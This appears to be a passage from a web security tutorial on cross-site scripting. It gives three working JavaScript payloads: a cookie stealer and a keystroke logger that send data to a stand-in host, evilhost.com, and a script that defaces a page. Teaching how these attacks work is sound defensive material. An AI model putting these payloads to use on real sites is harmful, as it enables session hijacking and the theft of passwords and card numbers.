Attackers have been very creative in exploiting XSS flaws, and because the injected payload is JavaScript running in the victim's browser with the privileges of the vulnerable site, the range of possible attacks is wide. The sections that follow cover three common uses of XSS combined with JavaScript: stealing cookies, logging keystrokes and defacing the website.
Let's discuss a few examples.
In every discussion of XSS attacks, the first thing that comes up is how cookies can be compromised using XSS and JavaScript. A stolen session cookie lets the attacker impersonate the victim for as long as the session remains valid, typically until the user logs out of the application or the session expires on the server.
The document.cookie property of the HTML DOM returns all cookies belonging to the current page's origin that are visible to scripts. Cookies set with the HttpOnly flag are not included, so this technique only works against session cookies that lack the flag. For example, the attacker can inject the following script into the comments section of a website vulnerable to XSS:
<script>
// Redirect the victim's browser to the attacker's logger, carrying the
// page's cookies in the query string. encodeURIComponent keeps characters
// such as '&' in a cookie value from truncating the data.
document.location = 'http://www.evilhost.com/cookielogger.php?cookie=' + encodeURIComponent(document.cookie);
</script>
When a user views the web page, the comments are downloaded along with it. This includes the preceding script, which sends the user's cookies to the evilhost.com server under the control of the attacker. Because the browser is redirected, this variant is noisy; the keylogger below shows a quieter way to exfiltrate data.
The attacker can also capture the victim's keystrokes by injecting JavaScript that logs everything the user types on the vulnerable page, such as passwords and credit card numbers, and sends it to a server under the attacker's control.
A sample script that would log all keystrokes is shown here:
<script>
// Register a handler that fires on every keypress in the page.
document.onkeypress = function (e) {
  // Loading an image is a silent way to make a request: no redirect,
  // no visible change to the page. The key code travels in the URL.
  var img = new Image();
  img.src = 'http://www.evilhost.com/keylogger.php?data=' + e.which;
};
</script>
Whenever the user presses a key, the onkeypress event is triggered and the handler receives an event object, e, describing that key. The which property of e holds the code of the key that was pressed; the script appends it to the image URL, so each keystroke reaches the attacker's server as a separate request that appears in its access log.
Website defacement is an attack that changes the visual appearance of a website. These attacks are mostly carried out by hacktivists who want to promote their agenda. The document.body.innerHTML property allows JavaScript to read and replace the contents of the loaded HTML page. This feature exists for legitimate purposes, but like most features it can also be abused, and in this case it is used to deface the page as rendered in the victim's browser (the server-side content is untouched, so only users who load the injected payload see the change).
By injecting the following script, the contents of the current page are replaced with the text THIS WEBSITE IS UNDER ATTACK:
<script>
// Overwrite the whole body of the rendered page with attacker-controlled HTML.
document.body.innerHTML = "<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER ATTACK</h1></div>";
</script>